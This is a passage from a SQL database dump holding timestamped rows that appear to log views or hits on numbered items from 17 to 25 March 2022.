01:58:40'),(47386,3724,1,'2022-03-17','2022-03-17 02:06:10'),(47387,1606,1,'2022-03-17','2022-03-17 02:09:57'),(47388,2150,1,'2022-03-17','2022-03-17 02:10:23'),(47389,3724,1,'2022-03-17','2022-03-17 02:39:54'),(47390,1604,1,'2022-03-17','2022-03-17 03:51:50'),(47391,4529,1,'2022-03-17','2022-03-17 04:12:18'),(47392,2801,1,'2022-03-17','2022-03-17 06:00:54'),(47393,3724,1,'2022-03-17','2022-03-17 06:02:47'),(47394,3307,1,'2022-03-17','2022-03-17 06:07:13'),(47395,3285,1,'2022-03-17','2022-03-17 06:15:59'),(47396,72,1,'2022-03-17','2022-03-17 06:40:30'),(47397,91,1,'2022-03-17','2022-03-17 06:42:23'),(47398,4542,1,'2022-03-17','2022-03-17 06:43:21'),(47399,4542,1,'2022-03-17','2022-03-17 06:43:21'),(47400,1594,1,'2022-03-17','2022-03-17 07:10:00'),(47401,1594,1,'2022-03-17','2022-03-17 07:50:00'),(47402,2309,1,'2022-03-17','2022-03-17 09:22:49'),(47403,1602,1,'2022-03-17','2022-03-17 09:32:02'),(47404,1610,1,'2022-03-17','2022-03-17 11:11:20'),(47405,3030,1,'2022-03-17','2022-03-17 11:42:26'),(47406,1745,1,'2022-03-17','2022-03-17 12:01:26'),(47407,1745,1,'2022-03-17','2022-03-17 12:04:49'),(47408,1745,1,'2022-03-17','2022-03-17 12:05:02'),(47409,2297,1,'2022-03-17','2022-03-17 12:15:01'),(47410,91,1,'2022-03-17','2022-03-17 12:23:14'),(47411,1600,1,'2022-03-17','2022-03-17 12:31:06'),(47412,80,1,'2022-03-17','2022-03-17 12:51:08'),(47413,3069,1,'2022-03-17','2022-03-17 12:54:01'),(47414,1606,1,'2022-03-17','2022-03-17 13:04:27'),(47415,4517,1,'2022-03-17','2022-03-17 13:09:08'),(47416,2309,1,'2022-03-17','2022-03-17 13:38:20'),(47417,2309,1,'2022-03-17','2022-03-17 13:38:50'),(47418,2309,1,'2022-03-17','2022-03-17 13:39:07'),(47419,4514,1,'2022-03-17','2022-03-17 13:39:09'),(47420,2309,1,'2022-03-17','2022-03-17 13:39:33'),(47421,2309,1,'2022-03-17','2022-03-17 13:39:56'),(47422,2309,1,'2022-03-17','2022-03-17 13:40:17'),(47423,4529,1,'2022-03-17','2022-03-17 13:59:08'),(47424,4514,1,'2022-03-17','2022-03-17 14:30:09'),(47425,1582,1,'2022-03-17','2022-03-17 14:38:58'),(47426,4529,1,'2022-03-17','2022-03-17 14:49:34'),(47427,474,1,'2022-03-17','2022-03-17 14:50:09'),(47428,84,1,'2022-03-17','2022-03-17 14:50:24'),(47429,1877,1,'2022-03-17','2022-03-17 14:50:33'),(47430,80,1,'2022-03-17','2022-03-17 15:03:27'),(47431,80,1,'2022-03-17','2022-03-17 15:03:33'),(47432,4457,1,'2022-03-17','2022-03-17 15:13:50'),(47433,3731,1,'2022-03-17','2022-03-17 15:26:47'),(47434,1745,1,'2022-03-17','2022-03-17 15:40:35'),(47435,84,1,'2022-03-17','2022-03-17 15:45:34'),(47436,68,1,'2022-03-17','2022-03-17 15:46:28'),(47437,72,1,'2022-03-17','2022-03-17 15:46:41'),(47438,4524,1,'2022-03-17','2022-03-17 16:25:05'),(47439,4454,1,'2022-03-17','2022-03-17 16:39:13'),(47440,91,1,'2022-03-17','2022-03-17 16:47:18'),(47441,4542,1,'2022-03-17','2022-03-17 16:49:14'),(47442,2309,1,'2022-03-17','2022-03-17 17:30:36'),(47443,473,1,'2022-03-17','2022-03-17 17:48:57'),(47444,487,1,'2022-03-17','2022-03-17 17:48:58'),(47445,3313,1,'2022-03-17','2022-03-17 17:53:46'),(47446,91,1,'2022-03-17','2022-03-17 17:57:17'),(47447,471,1,'2022-03-17','2022-03-17 19:13:42'),(47448,477,1,'2022-03-17','2022-03-17 20:03:00'),(47449,80,1,'2022-03-17','2022-03-17 20:41:03'),(47450,84,1,'2022-03-17','2022-03-17 21:26:25'),(47451,1726,1,'2022-03-17','2022-03-17 21:45:26'),(47452,1586,1,'2022-03-17','2022-03-17 22:19:36'),(47453,72,1,'2022-03-17','2022-03-17 22:40:40'),(47454,87,1,'2022-03-17','2022-03-17 23:42:00'),(47455,87,1,'2022-03-17','2022-03-17 23:53:12'),(47456,2704,1,'2022-03-18','2022-03-18 00:01:58'),(47457,4420,1,'2022-03-18','2022-03-18 00:10:42'),(47458,72,1,'2022-03-18','2022-03-18 00:16:33'),(47459,3479,1,'2022-03-18','2022-03-18 00:28:28'),(47460,4420,1,'2022-03-18','2022-03-18 00:35:19'),(47461,3479,1,'2022-03-18','2022-03-18 00:41:13'),(47462,3069,1,'2022-03-18','2022-03-18 00:47:52'),(47463,4520,1,'2022-03-18','2022-03-18 00:50:54'),(47464,1695,1,'2022-03-18','2022-03-18 00:55:48'),(47465,1600,1,'2022-03-18','2022-03-18 01:00:47'),(47466,4520,1,'2022-03-18','2022-03-18 01:10:14'),(47467,1598,1,'2022-03-18','2022-03-18 01:35:33'),(47468,4529,1,'2022-03-18','2022-03-18 01:59:19'),(47469,4524,1,'2022-03-18','2022-03-18 02:10:12'),(47470,2609,1,'2022-03-18','2022-03-18 02:15:01'),(47471,87,1,'2022-03-18','2022-03-18 06:45:16'),(47472,1872,1,'2022-03-18','2022-03-18 06:45:33'),(47473,91,1,'2022-03-18','2022-03-18 06:46:04'),(47474,4546,1,'2022-03-18','2022-03-18 06:47:03'),(47475,4546,1,'2022-03-18','2022-03-18 06:47:03'),(47476,3271,1,'2022-03-18','2022-03-18 06:56:13'),(47477,4520,1,'2022-03-18','2022-03-18 07:19:27'),(47478,72,1,'2022-03-18','2022-03-18 08:06:04'),(47479,1614,1,'2022-03-18','2022-03-18 09:41:08'),(47480,2503,1,'2022-03-18','2022-03-18 09:58:49'),(47481,1772,1,'2022-03-18','2022-03-18 10:03:03'),(47482,1772,1,'2022-03-18','2022-03-18 10:03:12'),(47483,1772,1,'2022-03-18','2022-03-18 10:03:42'),(47484,1772,1,'2022-03-18','2022-03-18 10:04:22'),(47485,3534,1,'2022-03-18','2022-03-18 12:09:08'),(47486,3534,1,'2022-03-18','2022-03-18 12:10:07'),(47487,3534,1,'2022-03-18','2022-03-18 12:18:55'),(47488,4404,1,'2022-03-18','2022-03-18 12:29:47'),(47489,3069,1,'2022-03-18','2022-03-18 12:31:24'),(47490,3069,1,'2022-03-18','2022-03-18 12:37:08'),(47491,1598,1,'2022-03-18','2022-03-18 12:49:16'),(47492,1600,1,'2022-03-18','2022-03-18 12:58:52'),(47493,1782,1,'2022-03-18','2022-03-18 12:59:59'),(47494,3282,1,'2022-03-18','2022-03-18 13:28:50'),(47495,72,1,'2022-03-18','2022-03-18 13:32:21'),(47496,4576,1,'2022-03-18','2022-03-18 13:35:19'),(47497,4576,1,'2022-03-18','2022-03-18 13:37:38'),(47498,72,1,'2022-03-18','2022-03-18 13:39:26'),(47499,4498,1,'2022-03-18','2022-03-18 13:39:34'),(47500,72,1,'2022-03-18','2022-03-18 13:39:41'),(47501,1598,1,'2022-03-18','2022-03-18 13:39:47'),(47502,72,1,'2022-03-18','2022-03-18 13:40:03'),(47503,72,1,'2022-03-18','2022-03-18 13:41:36'),(47504,72,1,'2022-03-18','2022-03-18 13:44:20'),(47505,72,1,'2022-03-18','2022-03-18 13:46:45'),(47506,4524,1,'2022-03-18','2022-03-18 13:59:03'),(47507,2911,1,'2022-03-18','2022-03-18 14:15:05'),(47508,3030,1,'2022-03-18','2022-03-18 15:09:48'),(47509,335,1,'2022-03-18','2022-03-18 16:23:49'),(47510,3030,1,'2022-03-18','2022-03-18 21:22:26'),(47511,3030,1,'2022-03-18','2022-03-18 21:22:32'),(47512,4329,1,'2022-03-18','2022-03-18 22:28:46'),(47513,468,1,'2022-03-19','2022-03-19 00:21:36'),(47514,468,1,'2022-03-19','2022-03-19 00:39:32'),(47515,3069,1,'2022-03-19','2022-03-19 01:02:13'),(47516,1600,1,'2022-03-19','2022-03-19 01:29:42'),(47517,1720,1,'2022-03-19','2022-03-19 04:45:52'),(47518,3269,1,'2022-03-19','2022-03-19 05:45:49'),(47519,3069,1,'2022-03-19','2022-03-19 06:16:17'),(47520,4457,1,'2022-03-19','2022-03-19 07:43:22'),(47521,1598,1,'2022-03-19','2022-03-19 08:10:18'),(47522,80,1,'2022-03-19','2022-03-19 08:28:13'),(47523,1598,1,'2022-03-19','2022-03-19 08:52:49'),(47524,72,1,'2022-03-19','2022-03-19 09:06:24'),(47525,4396,1,'2022-03-19','2022-03-19 09:40:31'),(47526,3030,1,'2022-03-19','2022-03-19 10:44:17'),(47527,4335,1,'2022-03-19','2022-03-19 10:44:54'),(47528,4524,1,'2022-03-19','2022-03-19 10:48:19'),(47529,3030,1,'2022-03-19','2022-03-19 10:51:22'),(47530,1598,1,'2022-03-19','2022-03-19 11:14:54'),(47531,1614,1,'2022-03-19','2022-03-19 11:46:44'),(47532,1600,1,'2022-03-19','2022-03-19 12:15:03'),(47533,1614,1,'2022-03-19','2022-03-19 12:30:33'),(47534,1741,1,'2022-03-19','2022-03-19 13:30:16'),(47535,1594,1,'2022-03-19','2022-03-19 13:52:16'),(47536,2704,1,'2022-03-19','2022-03-19 13:55:20'),(47537,1612,1,'2022-03-19','2022-03-19 14:08:41'),(47538,1614,1,'2022-03-19','2022-03-19 14:11:39'),(47539,3030,1,'2022-03-19','2022-03-19 14:23:16'),(47540,1586,1,'2022-03-19','2022-03-19 14:26:44'),(47541,2457,1,'2022-03-19','2022-03-19 15:55:08'),(47542,3030,1,'2022-03-19','2022-03-19 16:01:04'),(47543,108,1,'2022-03-19','2022-03-19 16:21:02'),(47544,1608,1,'2022-03-19','2022-03-19 16:21:35'),(47545,3674,1,'2022-03-19','2022-03-19 16:21:43'),(47546,2159,1,'2022-03-19','2022-03-19 16:22:08'),(47547,72,1,'2022-03-19','2022-03-19 16:39:42'),(47548,2297,1,'2022-03-19','2022-03-19 16:50:55'),(47549,3271,1,'2022-03-19','2022-03-19 17:20:54'),(47550,2297,1,'2022-03-19','2022-03-19 17:20:57'),(47551,473,1,'2022-03-19','2022-03-19 17:50:53'),(47552,3030,1,'2022-03-19','2022-03-19 18:10:44'),(47553,3752,1,'2022-03-19','2022-03-19 18:18:12'),(47554,2150,1,'2022-03-19','2022-03-19 18:20:54'),(47555,2297,1,'2022-03-19','2022-03-19 18:50:57'),(47556,1715,1,'2022-03-19','2022-03-19 18:51:27'),(47557,2309,1,'2022-03-19','2022-03-19 18:57:06'),(47558,2309,1,'2022-03-19','2022-03-19 18:57:16'),(47559,2309,1,'2022-03-19','2022-03-19 18:57:32'),(47560,2309,1,'2022-03-19','2022-03-19 18:58:00'),(47561,91,1,'2022-03-19','2022-03-19 19:20:59'),(47562,3746,1,'2022-03-19','2022-03-19 19:35:41'),(47563,80,1,'2022-03-19','2022-03-19 19:50:47'),(47564,335,1,'2022-03-19','2022-03-19 21:07:02'),(47565,68,1,'2022-03-19','2022-03-19 21:07:14'),(47566,1614,1,'2022-03-19','2022-03-19 22:24:12'),(47567,1586,1,'2022-03-19','2022-03-19 22:50:11'),(47568,1544,1,'2022-03-19','2022-03-19 22:54:13'),(47569,1598,1,'2022-03-19','2022-03-19 23:09:44'),(47570,1726,1,'2022-03-19','2022-03-19 23:24:13'),(47571,1606,1,'2022-03-19','2022-03-19 23:54:12'),(47572,2993,1,'2022-03-19','2022-03-19 23:54:14'),(47573,72,1,'2022-03-20','2022-03-20 00:19:20'),(47574,72,1,'2022-03-20','2022-03-20 00:20:30'),(47575,1606,1,'2022-03-20','2022-03-20 00:31:59'),(47576,1606,1,'2022-03-20','2022-03-20 00:42:11'),(47577,87,1,'2022-03-20','2022-03-20 00:49:19'),(47578,1600,1,'2022-03-20','2022-03-20 00:54:21'),(47579,4591,1,'2022-03-20','2022-03-20 00:56:45'),(47580,1695,1,'2022-03-20','2022-03-20 01:04:17'),(47581,1614,1,'2022-03-20','2022-03-20 01:06:14'),(47582,4335,1,'2022-03-20','2022-03-20 01:18:12'),(47583,72,1,'2022-03-20','2022-03-20 01:19:18'),(47584,486,1,'2022-03-20','2022-03-20 01:34:49'),(47585,1544,1,'2022-03-20','2022-03-20 01:42:15'),(47586,3752,1,'2022-03-20','2022-03-20 02:06:32'),(47587,1608,1,'2022-03-20','2022-03-20 02:15:30'),(47588,3041,1,'2022-03-20','2022-03-20 03:15:14'),(47589,3030,1,'2022-03-20','2022-03-20 03:20:45'),(47590,3240,1,'2022-03-20','2022-03-20 03:45:14'),(47591,3746,1,'2022-03-20','2022-03-20 04:06:15'),(47592,1747,1,'2022-03-20','2022-03-20 05:02:51'),(47593,2658,1,'2022-03-20','2022-03-20 05:09:31'),(47594,1582,1,'2022-03-20','2022-03-20 09:21:35'),(47595,1608,1,'2022-03-20','2022-03-20 10:18:42'),(47596,2558,1,'2022-03-20','2022-03-20 10:19:46'),(47597,1602,1,'2022-03-20','2022-03-20 11:50:32'),(47598,1544,1,'2022-03-20','2022-03-20 11:59:57'),(47599,3030,1,'2022-03-20','2022-03-20 12:11:04'),(47600,1608,1,'2022-03-20','2022-03-20 12:19:14'),(47601,1596,1,'2022-03-20','2022-03-20 12:28:50'),(47602,1598,1,'2022-03-20','2022-03-20 12:48:32'),(47603,3752,1,'2022-03-20','2022-03-20 12:58:39'),(47604,4335,1,'2022-03-20','2022-03-20 13:18:35'),(47605,1588,1,'2022-03-20','2022-03-20 13:25:41'),(47606,3746,1,'2022-03-20','2022-03-20 13:38:36'),(47607,4416,1,'2022-03-20','2022-03-20 13:48:32'),(47608,4524,1,'2022-03-20','2022-03-20 13:58:33'),(47609,1747,1,'2022-03-20','2022-03-20 14:49:08'),(47610,72,1,'2022-03-20','2022-03-20 15:13:43'),(47611,1590,1,'2022-03-20','2022-03-20 15:14:54'),(47612,4335,1,'2022-03-20','2022-03-20 15:28:33'),(47613,1782,1,'2022-03-20','2022-03-20 16:20:47'),(47614,1600,1,'2022-03-20','2022-03-20 18:09:51'),(47615,4416,1,'2022-03-20','2022-03-20 18:49:04'),(47616,1877,1,'2022-03-20','2022-03-20 18:58:24'),(47617,3023,1,'2022-03-20','2022-03-20 19:10:39'),(47618,2154,1,'2022-03-20','2022-03-20 19:44:20'),(47619,1612,1,'2022-03-20','2022-03-20 19:47:53'),(47620,1600,1,'2022-03-20','2022-03-20 21:03:26'),(47621,2297,1,'2022-03-20','2022-03-20 22:29:57'),(47622,72,1,'2022-03-20','2022-03-20 23:10:14'),(47623,1602,1,'2022-03-20','2022-03-20 23:17:12'),(47624,4524,1,'2022-03-21','2022-03-21 00:53:07'),(47625,1877,1,'2022-03-21','2022-03-21 01:00:52'),(47626,4587,1,'2022-03-21','2022-03-21 01:00:55'),(47627,1741,1,'2022-03-21','2022-03-21 01:20:54'),(47628,4591,1,'2022-03-21','2022-03-21 01:40:57'),(47629,3030,1,'2022-03-21','2022-03-21 03:37:14'),(47630,1594,1,'2022-03-21','2022-03-21 05:51:50'),(47631,2813,1,'2022-03-21','2022-03-21 07:12:01'),(47632,72,1,'2022-03-21','2022-03-21 07:45:30'),(47633,2813,1,'2022-03-21','2022-03-21 08:10:56'),(47634,4412,1,'2022-03-21','2022-03-21 08:23:44'),(47635,1594,1,'2022-03-21','2022-03-21 08:26:08'),(47636,3030,1,'2022-03-21','2022-03-21 09:10:06'),(47637,3006,1,'2022-03-21','2022-03-21 09:10:59'),(47638,4520,1,'2022-03-21','2022-03-21 09:43:45'),(47639,4566,1,'2022-03-21','2022-03-21 09:44:11'),(47640,4448,1,'2022-03-21','2022-03-21 10:41:18'),(47641,2775,1,'2022-03-21','2022-03-21 11:28:50'),(47642,1600,1,'2022-03-21','2022-03-21 11:30:55'),(47643,1598,1,'2022-03-21','2022-03-21 12:03:59'),(47644,3030,1,'2022-03-21','2022-03-21 12:14:08'),(47645,1600,1,'2022-03-21','2022-03-21 12:20:59'),(47646,1544,1,'2022-03-21','2022-03-21 12:30:22'),(47647,3752,1,'2022-03-21','2022-03-21 13:01:07'),(47648,1877,1,'2022-03-21','2022-03-21 13:20:56'),(47649,4529,1,'2022-03-21','2022-03-21 13:21:39'),(47650,3764,1,'2022-03-21','2022-03-21 13:21:44'),(47651,4524,1,'2022-03-21','2022-03-21 13:21:47'),(47652,1544,1,'2022-03-21','2022-03-21 13:26:20'),(47653,3226,1,'2022-03-21','2022-03-21 13:35:35'),(47654,4520,1,'2022-03-21','2022-03-21 13:41:11'),(47655,72,1,'2022-03-21','2022-03-21 14:47:25'),(47656,4591,1,'2022-03-21','2022-03-21 15:24:56'),(47657,1598,1,'2022-03-21','2022-03-21 15:49:19'),(47658,2558,1,'2022-03-21','2022-03-21 15:51:48'),(47659,1544,1,'2022-03-21','2022-03-21 16:34:20'),(47660,1544,1,'2022-03-21','2022-03-21 16:35:52'),(47661,3030,1,'2022-03-21','2022-03-21 17:30:53'),(47662,3102,1,'2022-03-21','2022-03-21 18:59:51'),(47663,1544,1,'2022-03-21','2022-03-21 20:51:47'),(47664,1544,1,'2022-03-21','2022-03-21 20:51:49'),(47665,1544,1,'2022-03-21','2022-03-21 20:51:50'),(47666,1598,1,'2022-03-21','2022-03-21 21:02:15'),(47667,72,1,'2022-03-21','2022-03-21 21:02:20'),(47668,1544,1,'2022-03-21','2022-03-21 21:21:07'),(47669,72,1,'2022-03-21','2022-03-21 21:53:39'),(47670,87,1,'2022-03-21','2022-03-21 22:04:39'),(47671,486,1,'2022-03-21','2022-03-21 23:05:49'),(47672,3030,1,'2022-03-21','2022-03-21 23:27:27'),(47673,2309,1,'2022-03-21','2022-03-21 23:30:32'),(47674,1600,1,'2022-03-21','2022-03-21 23:40:13'),(47675,3752,1,'2022-03-22','2022-03-22 00:23:06'),(47676,2309,1,'2022-03-22','2022-03-22 00:30:21'),(47677,2993,1,'2022-03-22','2022-03-22 00:33:35'),(47678,3752,1,'2022-03-22','2022-03-22 00:57:47'),(47679,3746,1,'2022-03-22','2022-03-22 01:07:48'),(47680,1877,1,'2022-03-22','2022-03-22 01:19:07'),(47681,1877,1,'2022-03-22','2022-03-22 01:53:43'),(47682,468,1,'2022-03-22','2022-03-22 02:16:32'),(47683,4524,1,'2022-03-22','2022-03-22 02:18:08'),(47684,4591,1,'2022-03-22','2022-03-22 02:28:41'),(47685,4524,1,'2022-03-22','2022-03-22 02:40:04'),(47686,72,1,'2022-03-22','2022-03-22 03:05:39'),(47687,1695,1,'2022-03-22','2022-03-22 04:05:09'),(47688,1614,1,'2022-03-22','2022-03-22 04:22:50'),(47689,1695,1,'2022-03-22','2022-03-22 04:35:08'),(47690,1598,1,'2022-03-22','2022-03-22 04:48:35'),(47691,87,1,'2022-03-22','2022-03-22 05:05:08'),(47692,3027,1,'2022-03-22','2022-03-22 05:07:45'),(47693,1582,1,'2022-03-22','2022-03-22 06:24:26'),(47694,1582,1,'2022-03-22','2022-03-22 06:26:28'),(47695,3030,1,'2022-03-22','2022-03-22 06:34:30'),(47696,1594,1,'2022-03-22','2022-03-22 08:36:10'),(47697,1544,1,'2022-03-22','2022-03-22 11:49:52'),(47698,1544,1,'2022-03-22','2022-03-22 11:54:49'),(47699,3030,1,'2022-03-22','2022-03-22 12:37:55'),(47700,1598,1,'2022-03-22','2022-03-22 12:50:34'),(47701,3030,1,'2022-03-22','2022-03-22 13:02:08'),(47702,1614,1,'2022-03-22','2022-03-22 13:03:18'),(47703,3030,1,'2022-03-22','2022-03-22 13:13:33'),(47704,2457,1,'2022-03-22','2022-03-22 13:20:31'),(47705,3746,1,'2022-03-22','2022-03-22 13:51:11'),(47706,72,1,'2022-03-22','2022-03-22 14:11:31'),(47707,1608,1,'2022-03-22','2022-03-22 14:17:10'),(47708,2457,1,'2022-03-22','2022-03-22 14:22:01'),(47709,1600,1,'2022-03-22','2022-03-22 14:47:37'),(47710,3030,1,'2022-03-22','2022-03-22 15:42:19'),(47711,80,1,'2022-03-22','2022-03-22 15:43:54'),(47712,80,1,'2022-03-22','2022-03-22 15:52:43'),(47713,4457,1,'2022-03-22','2022-03-22 16:08:26'),(47714,4457,1,'2022-03-22','2022-03-22 17:30:09'),(47715,468,1,'2022-03-22','2022-03-22 18:16:49'),(47716,468,1,'2022-03-22','2022-03-22 18:17:35'),(47717,1598,1,'2022-03-22','2022-03-22 18:47:15'),(47718,1602,1,'2022-03-22','2022-03-22 19:01:23'),(47719,1612,1,'2022-03-22','2022-03-22 20:41:43'),(47720,68,1,'2022-03-22','2022-03-22 20:41:47'),(47721,76,1,'2022-03-22','2022-03-22 20:42:03'),(47722,68,1,'2022-03-22','2022-03-22 20:42:09'),(47723,80,1,'2022-03-22','2022-03-22 20:42:14'),(47724,68,1,'2022-03-22','2022-03-22 20:42:18'),(47725,68,1,'2022-03-22','2022-03-22 20:42:39'),(47726,1612,1,'2022-03-22','2022-03-22 20:42:40'),(47727,1614,1,'2022-03-22','2022-03-22 21:53:36'),(47728,2309,1,'2022-03-22','2022-03-22 22:00:25'),(47729,1600,1,'2022-03-22','2022-03-22 22:59:45'),(47730,4587,1,'2022-03-22','2022-03-22 23:49:54'),(47731,3746,1,'2022-03-23','2022-03-23 00:44:55'),(47732,2309,1,'2022-03-23','2022-03-23 00:55:48'),(47733,3269,1,'2022-03-23','2022-03-23 01:05:59'),(47734,1606,1,'2022-03-23','2022-03-23 01:13:22'),(47735,2309,1,'2022-03-23','2022-03-23 01:17:38'),(47736,1877,1,'2022-03-23','2022-03-23 01:29:36'),(47737,1600,1,'2022-03-23','2022-03-23 01:43:48'),(47738,4587,1,'2022-03-23','2022-03-23 02:05:38'),(47739,3180,1,'2022-03-23','2022-03-23 02:43:37'),(47740,2457,1,'2022-03-23','2022-03-23 02:45:53'),(47741,3746,1,'2022-03-23','2022-03-23 03:42:27'),(47742,1598,1,'2022-03-23','2022-03-23 05:11:37'),(47743,2609,1,'2022-03-23','2022-03-23 05:34:44'),(47744,3030,1,'2022-03-23','2022-03-23 07:01:46'),(47745,80,1,'2022-03-23','2022-03-23 07:18:14'),(47746,2309,1,'2022-03-23','2022-03-23 09:04:01'),(47747,1766,1,'2022-03-23','2022-03-23 10:07:23'),(47748,1774,1,'2022-03-23','2022-03-23 10:09:07'),(47749,1766,1,'2022-03-23','2022-03-23 10:09:56'),(47750,1774,1,'2022-03-23','2022-03-23 10:12:18'),(47751,2769,1,'2022-03-23','2022-03-23 10:12:58'),(47752,2904,1,'2022-03-23','2022-03-23 10:15:15'),(47753,102,1,'2022-03-23','2022-03-23 10:16:06'),(47754,2769,1,'2022-03-23','2022-03-23 10:20:36'),(47755,3313,1,'2022-03-23','2022-03-23 10:31:27'),(47756,3313,1,'2022-03-23','2022-03-23 10:36:44'),(47757,4587,1,'2022-03-23','2022-03-23 10:38:29'),(47758,3030,1,'2022-03-23','2022-03-23 10:46:40'),(47759,1602,1,'2022-03-23','2022-03-23 10:54:02'),(47760,1610,1,'2022-03-23','2022-03-23 11:00:39'),(47761,2457,1,'2022-03-23','2022-03-23 11:27:07'),(47762,3030,1,'2022-03-23','2022-03-23 11:48:48'),(47763,1600,1,'2022-03-23','2022-03-23 11:57:56'),(47764,68,1,'2022-03-23','2022-03-23 12:04:33'),(47765,1606,1,'2022-03-23','2022-03-23 12:27:35'),(47766,1610,1,'2022-03-23','2022-03-23 12:39:42'),(47767,2457,1,'2022-03-23','2022-03-23 12:47:06'),(47768,2457,1,'2022-03-23','2022-03-23 12:57:05'),(47769,1602,1,'2022-03-23','2022-03-23 12:59:46'),(47770,1544,1,'2022-03-23','2022-03-23 12:59:47'),(47771,1598,1,'2022-03-23','2022-03-23 13:08:07'),(47772,1606,1,'2022-03-23','2022-03-23 13:17:07'),(47773,2309,1,'2022-03-23','2022-03-23 13:31:23'),(47774,2457,1,'2022-03-23','2022-03-23 13:42:18'),(47775,76,1,'2022-03-23','2022-03-23 13:50:13'),(47776,1600,1,'2022-03-23','2022-03-23 14:07:34'),(47777,3030,1,'2022-03-23','2022-03-23 16:04:22'),(47778,1614,1,'2022-03-23','2022-03-23 16:31:05'),(47779,2457,1,'2022-03-23','2022-03-23 16:54:42'),(47780,91,1,'2022-03-23','2022-03-23 16:55:02'),(47781,2457,1,'2022-03-23','2022-03-23 16:56:13'),(47782,473,1,'2022-03-23','2022-03-23 17:17:02'),(47783,2309,1,'2022-03-23','2022-03-23 18:28:49'),(47784,482,1,'2022-03-23','2022-03-23 19:58:14'),(47785,1544,1,'2022-03-23','2022-03-23 20:18:53'),(47786,3764,1,'2022-03-23','2022-03-23 20:44:03'),(47787,2457,1,'2022-03-23','2022-03-23 21:58:38'),(47788,1544,1,'2022-03-23','2022-03-23 22:13:39'),(47789,1608,1,'2022-03-23','2022-03-23 23:21:15'),(47790,1598,1,'2022-03-24','2022-03-24 00:07:19'),(47791,2309,1,'2022-03-24','2022-03-24 00:12:07'),(47792,1598,1,'2022-03-24','2022-03-24 00:29:45'),(47793,1600,1,'2022-03-24','2022-03-24 00:35:19'),(47794,87,1,'2022-03-24','2022-03-24 00:53:16'),(47795,87,1,'2022-03-24','2022-03-24 01:15:22'),(47796,1602,1,'2022-03-24','2022-03-24 01:50:07'),(47797,2813,1,'2022-03-24','2022-03-24 02:00:45'),(47798,2904,1,'2022-03-24','2022-03-24 02:05:05'),(47799,4404,1,'2022-03-24','2022-03-24 02:13:23'),(47800,4404,1,'2022-03-24','2022-03-24 02:13:36'),(47801,1600,1,'2022-03-24','2022-03-24 02:47:43'),(47802,1877,1,'2022-03-24','2022-03-24 03:01:37'),(47803,1590,1,'2022-03-24','2022-03-24 03:13:41'),(47804,2457,1,'2022-03-24','2022-03-24 03:21:53'),(47805,2457,1,'2022-03-24','2022-03-24 03:57:42'),(47806,1598,1,'2022-03-24','2022-03-24 04:05:03'),(47807,3282,1,'2022-03-24','2022-03-24 04:12:06'),(47808,2769,1,'2022-03-24','2022-03-24 06:49:16'),(47809,1600,1,'2022-03-24','2022-03-24 07:50:38'),(47810,472,1,'2022-03-24','2022-03-24 08:42:28'),(47811,76,1,'2022-03-24','2022-03-24 08:42:44'),(47812,472,1,'2022-03-24','2022-03-24 08:42:51'),(47813,2297,1,'2022-03-24','2022-03-24 10:09:48'),(47814,2297,1,'2022-03-24','2022-03-24 10:11:33'),(47815,1600,1,'2022-03-24','2022-03-24 10:13:32'),(47816,2309,1,'2022-03-24','2022-03-24 10:48:35'),(47817,4391,1,'2022-03-24','2022-03-24 11:41:31'),(47818,3104,1,'2022-03-24','2022-03-24 11:51:40'),(47819,2410,1,'2022-03-24','2022-03-24 12:04:16'),(47820,570,1,'2022-03-24','2022-03-24 12:10:05'),(47821,570,1,'2022-03-24','2022-03-24 12:10:17'),(47822,570,1,'2022-03-24','2022-03-24 12:10:23'),(47823,4436,1,'2022-03-24','2022-03-24 12:36:20'),(47824,76,1,'2022-03-24','2022-03-24 12:42:45'),(47825,1586,1,'2022-03-24','2022-03-24 12:47:01'),(47826,1877,1,'2022-03-24','2022-03-24 13:45:36'),(47827,1877,1,'2022-03-24','2022-03-24 14:16:09'),(47828,1606,1,'2022-03-24','2022-03-24 14:50:25'),(47829,3030,1,'2022-03-24','2022-03-24 15:30:49'),(47830,1598,1,'2022-03-24','2022-03-24 15:34:42'),(47831,1600,1,'2022-03-24','2022-03-24 18:04:47'),(47832,3066,1,'2022-03-24','2022-03-24 18:30:13'),(47833,1544,1,'2022-03-24','2022-03-24 20:52:03'),(47834,1594,1,'2022-03-24','2022-03-24 20:58:59'),(47835,1544,1,'2022-03-24','2022-03-24 21:05:24'),(47836,2809,1,'2022-03-24','2022-03-24 22:16:29'),(47837,1600,1,'2022-03-24','2022-03-24 23:15:33'),(47838,2809,1,'2022-03-24','2022-03-24 23:44:42'),(47839,4582,1,'2022-03-25','2022-03-25 00:18:19'),(47840,4514,1,'2022-03-25','2022-03-25 00:34:30'),(47841,3746,1,'2022-03-25','2022-03-25 00:54:54'),(47842,1877,1,'2022-03-25','2022-03-25 04:21:32'),(47843,467,1,'2022-03-25','2022-03-25 05:16:19'),(47844,1602,1,'2022-03-25','2022-03-25 08:20:20'),(47845,1602,1,'2022-03-25','2022-03-25 08:21:14'),(47846,1598,1,'2022-03-25','2022-03-25 09:55:18'),(47847,2989,1,'2022-03-25','2022-03-25 10:12:47'),(47848,1602,1,'2022-03-25','2022-03-25 10:33:23'),(47849,1596,1,'2022-03-25','2022-03-25 10:35:57'),(47850,1600,1,'2022-03-25','2022-03-25 11:10:25'),(47851,3030,1,'2022-03-25','2022-03-25 11:30:09'),(47852,1877,1,'2022-03-25','2022-03-25 12:40:28'),(47853,4520,1,'2022-03-25','2022-03-25 13:14:32'),(47854,570,1,'2022-03-25','2022-03-25 14:08:54'),(47855,1588,1,'2022-03-25','2022-03-25 15:26:56'),(47856,1778,1,'2022-03-25','2022-03-25 15:43:23'),(47857,1778,1,'2022-03-25','2022-03-25 15:43:38'),(47858,1778,1,'2022-03-25','2022-03-25 15:43:55'),(47859,4582,1,'2022-03-25','2022-03-25 16:53:12'),(47860,1602,1,'2022-03-25','2022-03-25 17:07:41'),(47861,4566,1,'2022-03-25','2022-03-25 17:23:00'),(47862,4391,1,'2022-03-25','2022-03-25 17:55:11'),(47863,1606,1,'2022-03-25','2022-03-25 18:19:01'),(47864,1741,1,'2022-03-25','2022-03-25 18:35:04'),(47865,4457,1,'2022-03-25','2022-03-25 18:37:33'),(47866,4457,1,'2022-03-25','2022-03-25 18:38:45'),(47867,89,1,'2022-03-25','2022-03-25 18:39:09'),(47868,3752,1,'2022-03-25','2022-03-25 18:47:00'),(47869,4566,1,'2022-03-25','2022-03-25 19:26:00'),(47870,3746,1,'2022-03-25','2022-03-25 19:44:02'),(47871,1872,1,'2022-03-25','2022-03-25 